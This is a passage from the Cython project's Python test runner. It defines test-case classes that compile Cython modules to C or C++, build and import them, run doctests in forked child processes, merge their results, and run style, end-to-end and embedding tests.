suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if 'c' in languages and skip_c(tags):
languages = list(languages)
languages.remove('c')
if 'cpp' in languages and 'no-cpp' in tags['tag']:
languages = list(languages)
languages.remove('cpp')
if not languages:
return []
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
doctest_selector=self.doctest_selector,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False, doctest_selector=None,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.doctest_selector = doctest_selector
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
ext_compile_defines = CDEFS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
define_macros=ext_compile_defines,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
if self.doctest_selector is not None:
tests._tests[:] = [test for test in tests._tests if self.doctest_selector(test.id())]
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
excludelist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in excludelist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None, capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res == 0 and b'REFNANNY: ' in _out:
res = -1
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = os.path.abspath(os.path.join('..', '..', 'cython.py'))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
# just re-use the FileListExclude implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, module_name in deps.items():
try:
module = __import__(module_name)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
print("Test dependency not found: '%s'" % module_name)
else:
version = self.find_dep_version(module_name, module)
print("Test dependency found: '%s' version %s" % (module_name, version))
self.tests_missing_deps = []
def find_dep_version(self, name, module):
try:
version = module.__version__
except AttributeError:
stdlib_dir = os.path.dirname(shutil.__file__) + os.sep
module_path = getattr(module, '__file__', stdlib_dir) # no __file__? => builtin stdlib module
if module_path.startswith(stdlib_dir):
# stdlib module
version = sys.version.partition(' ')[0]
elif '.' in name:
# incrementally look for a parent package with version
name = name.rpartition('.')[0]
return self.find_dep_version(name, __import__(name))
else:
version = '?.?'
return version
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
